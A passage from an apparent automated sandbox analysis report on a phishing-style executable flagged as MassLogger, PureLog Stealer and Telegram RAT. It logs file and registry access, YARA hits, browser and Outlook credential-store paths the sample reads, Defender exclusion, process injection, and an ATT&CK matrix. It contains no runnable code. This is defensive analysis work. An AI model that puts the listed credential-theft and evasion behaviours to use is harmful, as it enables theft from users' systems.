                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST9A6E.tmp VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST9A7F.tmp VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeQueries volume information: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F68550 GetVolumeInformationW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,9_2_00F68550
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 00000009.00000002.2696625029.000000000794C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2671075234.000000000791C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7796, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		2
                  LSASS Driver                  		1
                  Abuse Elevation Control Mechanism                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		1
                  Taint Shared Content                  		11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		2
                  LSASS Driver                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution                  		1
                  Windows Service                  		1
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		1
                  Windows Service                  		3
                  Obfuscated Files or Information                  		NTDS13
                  System Information Discovery                  		Distributed Component Object ModelInput Capture14
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script311
                  Process Injection                  		23
                  Software Packing                  		LSA Secrets121
                  Security Software Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job                  		1
                  Timestomp                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
                  Masquerading                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                  Process Injection                  		Network Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564874 Sample: RFQ_PO N89397-GM7287-Order.... Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 61 reallyfreegeoip.org 2->61 63 zlenh.biz 2->63 65 19 other IPs or domains 2->65 73 Suricata IDS alerts for network traffic 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for dropped file 2->77 81 17 other signatures 2->81 8 RFQ_PO N89397-GM7287-Order.bat.exe 7 2->8         started        12 YRtQgzFlDnVSru.exe 2->12         started        14 elevation_service.exe 2->14         started        16 20 other processes 2->16 signatures3 79 Tries to detect the country of the analysis system (by using the IP) 61->79 process4 file5 51 C:\Users\user\AppData\...\YRtQgzFlDnVSru.exe, PE32 8->51 dropped 53 C:\...\YRtQgzFlDnVSru.exe:Zone.Identifier, ASCII 8->53 dropped 55 C:\Users\user\AppData\Local\...\tmpE707.tmp, XML 8->55 dropped 57 C:\...\RFQ_PO N89397-GM7287-Order.bat.exe.log, ASCII 8->57 dropped 93 Writes to foreign memory regions 8->93 95 Allocates memory in foreign processes 8->95 97 Adds a directory exclusion to Windows Defender 8->97 18 vbc.exe 15 3 8->18         started        23 powershell.exe 23 8->23         started        25 powershell.exe 23 8->25         started        27 schtasks.exe 1 8->27         started        99 Injects a PE file into a foreign processes 12->99 29 vbc.exe 12->29         started        31 schtasks.exe 12->31         started        59 C:\Windows\System32\sppsvc.exe, PE32+ 14->59 dropped 101 Infects executable files (exe, dll, sys, html) 14->101 103 Found direct / indirect Syscall (likely to bypass EDR) 14->103 105 Creates files inside the volume driver (system volume information) 16->105 107 Creates files in the system32 config directory 16->107 109 Contains 